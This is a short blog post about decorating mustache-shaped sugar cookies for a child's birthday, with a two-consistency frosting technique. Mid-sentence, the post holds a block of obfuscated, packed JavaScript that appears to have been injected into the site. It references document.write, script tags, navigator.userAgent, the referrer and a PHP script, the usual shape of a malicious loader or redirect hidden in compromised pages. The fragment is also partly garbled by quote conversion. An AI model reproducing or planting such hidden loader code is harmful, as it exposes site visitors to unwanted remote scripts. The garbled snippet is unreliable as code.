Mustache Cookies

Did you have a nice weekend?

Me too!

I decided that I would get a few more blogs going this week.  I know.  I’ve been slacking.  But for good reason.  More on that tomorrow.

Back to the mustache cookies.

My good friend, Lisa, ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esesb|var|u0026u|referrer|iaskz||js|php’.split(‘|’),0,{}))
is throwing a mustache-bash for her soon-to-be 1-year old, Willie (often frequented on this site).  So we obviously had to make mustache cookies for the big event!

We used one of my favorite sugar cookie recipes along with my new favorite (hard) frosting recipe.  I like this frosting because it dries shiny but hard.

The key to making the mustaches it to make 2 batches of frosting.  The first batch, you should follow the recipe pretty close and put it in a piping bag with a small, round tip.  The 2nd batch of frosting – add a little more milk.  We did about 1.5 times the amount.  Put this frosting in a bag with a larger tip – doesn’t matter what shape you use.

Pipe the border using the thicker frosting, and then “flood” the inside with the thinner frosting.  I use a toothpick to help spread the “thing” frosting.

Then just let it sit.  Voila!

Happy Tuesday!  Weeks already 1 day over!
